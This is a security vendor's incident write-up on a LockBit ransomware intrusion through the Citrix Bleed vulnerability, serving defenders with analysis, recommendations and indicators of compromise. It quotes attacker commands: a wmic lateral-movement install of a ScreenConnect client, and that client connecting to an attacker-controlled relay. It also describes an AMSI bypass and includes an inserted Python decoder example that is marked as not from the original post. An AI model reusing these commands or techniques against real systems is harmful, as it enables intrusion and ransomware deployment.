Citrix Bleed Vulnerability: A Gateway to LockBit Ransomware

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In October 2023, our 24/7 SOC received alerts that, upon investigation, led us to identify a LockBit ransomware attack. The initial indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com.

The Incident Handling team and the eSentire Threat Response Unit (TRU) further investigated the malicious activity. We assess with high confidence that the threat actor gained initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allows attackers to bypass authentication by retrieving valid session tokens.

The exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.

We have observed one of the files named “1411.dll” (SHA256: f392f3c875caad2d703fd3d8767272c7c7142c6a2e958f3362cdee28dc3c645d) dropped by the threat actor on multiple machines; the process chain looks like the following:

  • cmstart.exe > wfshell.exe > chrome.exe > 1411.dll

The wfshell.exe file is the Citrix WinFrame Shell that manages the environment of a user session, including tasks such as managing drive mappings, shares, printers, and more.

The “1411.dll” payload is a Brute Ratel DLL that was downloaded from the attacker’s hosting server 64.190.113[.]238. Upon running the DLL binary via regsvr32.exe, it initiates communication with the C2 server 173.44.141[.]125 over port 443. The file is then placed under the C:\ProgramData folder.

After dropping the Brute Ratel binary, the threat actor performed a Kerberoasting attack, where an attacker exploits the Kerberos protocol to steal service account credentials by requesting service tickets and then brute forcing their encrypted content offline to reveal the service accounts’ passwords.

“1.msi” (MD5: 3cfed171757ec4d482eaec4bc3ab6c8f) was dropped on another machine that the compromised user had access to. The installer is a ScreenConnect client that is deployed by the threat actor to obtain remote access to the machine and possibly exfiltrate data.

The threat actor attempted to move laterally and drop the ScreenConnect client to another host via WMI with the following command:

  • wmic /node:<REDACTED> process call create "msiexec.exe /i C:\1.msi /quiet /qn"

Upon execution, the ScreenConnect client connects to an attacker-controlled instance via the command:

  • ScreenConnect.ClientService.exe “?e=Access&y=Guest&h=instance-lipqpu-relay.screenconnect[.]com&p=443&<REDACTED>

The domain instance-lipqpu-relay.screenconnect[.]com is the attacker-controlled instance.

On another host, we observed the threat actor attempting to retrieve the ZIP archive named “netz.zip” from FileTransfer at hxxps[://]s25[.]filetransfer[.]io/storage/download/LzE9F5nDQ7jj. The archive contained netscan (a network discovery tool) and its dependencies (MD5: 495cc657c21814a1d4748ee1d44eced5), as shown in Figure 1.

Figure 1: Contents of netz.zip

Approximately two hours later, the threat actor attempted to retrieve the “lbbb.zip” from hxxps[://]s22[.]filetransfer[.]io/storage/download/QSM80MJVDAQS. The contents of the “lbbb.zip” are shown in Figure 2 below.

Figure 2: Contents of “lbbb.zip”
  • LBB.exe – LockBit binary.
  • LBB_pass.exe – LockBit binary that requires the passcode to run.
  • LBB_PS1.ps1 – partially unobfuscated LockBit PowerShell script to execute the ransomware.
  • LBB_PS1_obfuscated.ps1 – obfuscated version of LockBit PowerShell script.
  • LBB_PS1_pass – LockBit PowerShell script that requires passcode to run.
  • LBB_ReflectiveDll_DllMain.dll – LockBit DLL using Reflective DLL Injection technique that allows a Windows DLL (Dynamic Link Library) to be dynamically loaded from memory, bypassing the standard operating system loader.
  • LBB_Rundll32.dll – LockBit DLL ransomware binary.
  • LBB_Rundll32_pass.dll – LockBit DLL ransomware binary that requires a passcode for execution.
  • Password_dll.txt – instructions on how to run the LockBit DLL binary (LBB_Rundll32_pass.dll) with the passcode, as shown in Figure 3. The DLL can run in Global and Safe Modes; Safe Mode is used to bypass AntiVirus and EDR solutions.
  • Password_exe.txt – instructions on how to run the LockBit binary (LBB_pass.exe) with the passcode, as shown in Figure 4. The binary can run in Targeted Mode to encrypt specific folders and paths.
  • Password_ps1.txt – instructions on how to run the LockBit PowerShell script (LBB_PS1_pass) with passcode as shown in Figure 5.
Figure 3: Contents of Password_dll.txt
Figure 4: Contents of Password_exe.txt
Figure 5: Contents of Password_ps1.txt

For more technical details on LockBit, you can refer to this article.

The contents of LBB_PS1.ps1 contained the snippet shown in Figure 6.

Figure 6: Contents of LBB_PS1.ps1

The script performs the following:

  • The script attempts to disable AMSI. It does this by accessing the AmsiUtils class and setting the amsiInitFailed field to true, effectively telling the system that AMSI initialization has failed, and thereby bypassing it.
  • Checks the PowerShell version and the architecture of the operating system. If running on a 64-bit system, it launches a new instance of PowerShell in 32-bit mode, possibly to avoid compatibility issues.
  • Decodes the obfuscated $data via a custom decoding function. Each byte is extracted from an integer of the obfuscated data with a bitwise AND against 0x7F, which yields the lowest 7 bits of the integer. The extracted byte is stored in the $dB array. The integer is then right-shifted by 7 bits (achieved by subtracting the extracted byte and dividing by 0x80), which prepares the next 7 bits for extraction in the next iteration of the inner loop. After all integers have been processed, the byte array $dB is converted into an ASCII string.
  • Executes the decoded/deobfuscated data, which is a LockBit DLL binary (MD5: ab41549944d71fbd02deda7bc6ab00eb) as shown in Figure 7.
Figure 7: Deobfuscated PowerShell script
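The 7-bit unpacking step described above, reimplemented in Python as an added example (this is not code from the eSentire post or from the LBB_PS1.ps1 script). pack_7bit exists only to build a constructed sample; unpack_7bit mirrors the decoding loop. The post does not state how many 7-bit chunks each integer carries, so that count is assumed here as the chunks_per_int parameter.

```python
# Added example: Python re-implementation of the 7-bit unpacking loop
# described for LBB_PS1.ps1. Not code from the eSentire post.
# Assumption (not stated on the page): each integer carries a fixed
# number of 7-bit chunks, given here as chunks_per_int.

def pack_7bit(data: bytes, chunks_per_int: int) -> list[int]:
    """Inverse of unpack_7bit; used only to build a constructed sample.

    The first byte of each group lands in the lowest 7 bits, the next
    byte 7 bits higher, and so on (little-endian base-128)."""
    if any(b > 0x7F for b in data):
        raise ValueError("the scheme carries only 7-bit (ASCII) bytes")
    values = []
    for i in range(0, len(data), chunks_per_int):
        group = data[i:i + chunks_per_int]
        values.append(sum(b << (7 * j) for j, b in enumerate(group)))
    return values


def unpack_7bit(values: list[int], chunks_per_int: int) -> str:
    """Mirror of the script's decoder: AND with 0x7F to take the low 7 bits,
    store them, then shift right by 7 via (n - byte) / 0x80."""
    dB = bytearray()
    for n in values:
        for _ in range(chunks_per_int):
            byte = n & 0x7F          # lowest 7 bits of the integer
            dB.append(byte)
            n = (n - byte) // 0x80   # same as n >> 7 once the low bits are cleared
    # a short final group unpacks as trailing zero bytes; drop them
    return dB.rstrip(b"\x00").decode("ascii")


# Constructed sample: a harmless command packed three bytes per integer.
SAMPLE_TEXT = "Write-Output 'decoded'"
SAMPLE_INTS = pack_7bit(SAMPLE_TEXT.encode("ascii"), 3)


def demo() -> str:
    """Round-trips the constructed sample through the decoder."""
    return unpack_7bit(SAMPLE_INTS, 3)


if __name__ == "__main__":
    print(SAMPLE_INTS)
    print(demo())
```

When analysing a real sample, replace SAMPLE_INTS with the integer array from the script and adjust chunks_per_int to match the inner loop count observed in the decoder.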

What did we do?

After receiving alerts, our 24/7 SOC Cyber Analysts took action and blocked the indicators of compromise (IOCs) on all endpoints and network sensors to prevent further spread of the intrusion.

At the same time, we involved our Incident Response (IR) team to determine the full impact of the intrusion.

Meanwhile, our analysts isolated the affected host and informed the client about the suspicious activities, ensuring a comprehensive and coordinated response to the security incident.

What can you learn from this TRU Positive?

  • The early detection of ransomware precursor activities, such as unusual Rclone activity and connections to known malicious domains, is crucial. This highlights the need for vigilant monitoring and threat intelligence to identify potential threats before they escalate.
  • The exploitation of the Citrix Bleed vulnerability underscores the importance of promptly patching known vulnerabilities.
  • The identification of a malicious DLL (1411.dll) initiating from a trusted process (Citrix WinFrame Shell) demonstrates the need for robust endpoint detection and response (EDR) solutions.
  • The use of a Kerberoasting attack to steal service account credentials shows how attackers can exploit legitimate functionalities within an environment for malicious purposes.
  • The deployment of a ScreenConnect client and the use of Rclone for data exfiltration illustrate common tactics used by attackers for maintaining access and stealing sensitive information. Therefore, implementing controls to monitor and restrict unauthorized remote access and data transfer activities is essential.
  • The retrieval of ZIP archives containing malicious tools and ransomware components from a legitimate file transfer service (FileTransfer) highlights how attackers can misuse legitimate services to facilitate their attacks. Organizations should monitor for unusual file transfers and downloads, even from legitimate sources.

Recommendations from our Threat Response Unit (TRU):

  • Implement two-factor authentication for all Remote Monitoring and Management (RMM) tools, remote access solutions, VPNs, and other critical software systems. This adds an extra layer of security beyond just passwords.
  • Ensure that all remote access accounts and other key system accounts are secured with strong, unique passwords. This reduces the risk of unauthorized access due to compromised credentials.
  • Set up ACLs to allow only trusted IPs for accessing your systems. However, if an end customer is roaming or working remotely, they should connect through a VPN to ensure secure access.
  • Employees with access to RMM or remote access software should receive specialized training to critically evaluate communications that purport to be from these service providers. This helps in identifying and avoiding phishing attempts.
  • Ensure that your IT environment—including networks, endpoints, and logs, both on-premises and in the cloud—is continuously protected by a robust Managed Detection and Response solution. This ensures ongoing monitoring and protection against threats.
  • Be aware of the level of response, remediation, and incident handling included in your 24/7 Managed Detection and Response (MDR) service. Knowing the scope of services provided can help in effective and timely response to incidents.

Indicators of Compromise

Hashes are MD5 unless marked SHA256; domains, URLs and IP addresses are defanged.

  • 1411.dll (SHA256): f392f3c875caad2d703fd3d8767272c7c7142c6a2e958f3362cdee28dc3c645d
  • 1.msi: 3cfed171757ec4d482eaec4bc3ab6c8f
  • ScreenConnect attacker’s server: instance-lipqpu-relay.screenconnect[.]com
  • URL hosting “netz.zip”: hxxps[://]s25[.]filetransfer[.]io/storage/download/LzE9F5nDQ7jj
  • URL hosting “lbbb.zip”: hxxps[://]s22[.]filetransfer[.]io/storage/download/QSM80MJVDAQS
  • netscan.exe: 495cc657c21814a1d4748ee1d44eced5
  • LBB_PS1_obfuscated.ps1: 07364938088247b094ca98d57d9b96a0
  • LBB_PS1_pass.ps1: 700d2669ac6a2b8cf6dd0b2c00ad0857
  • LBB_PS1.ps1: f93bf0a7c899d85e62a7cf4ba43dac04
  • LBB.exe: eec0e9f4bae7896d2adacae5b4e910a5
  • LBB_pass.exe: 7aedeac687d3786024094f0d51544da0
  • Password_dll.txt: fb806c9acd186ac609621f4db55baa04
  • Password_exe.txt: 29fc5b0429d9e62a9dc2fd4c3f688b1e
  • Password_ps1.txt: b2ff2144638af66e6a9e36eda0f8f733
  • LBB_Rundll32_pass.dll: 58afb885c2d0e2eaa92901df540cc973
  • LBB_Rundll32.dll: 8de7ec4e13f555c3497e54c27765e0c8
  • LBB_ReflectiveDll_DllMain.dll: a31e6ffa9f025ca3657af9f78ea53940
  • LockBit DLL binary: ab41549944d71fbd02deda7bc6ab00eb
  • Attacker’s C2: 64.190.113[.]238
  • Brute Ratel C2: 173.44.141[.]125

References

Source: https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware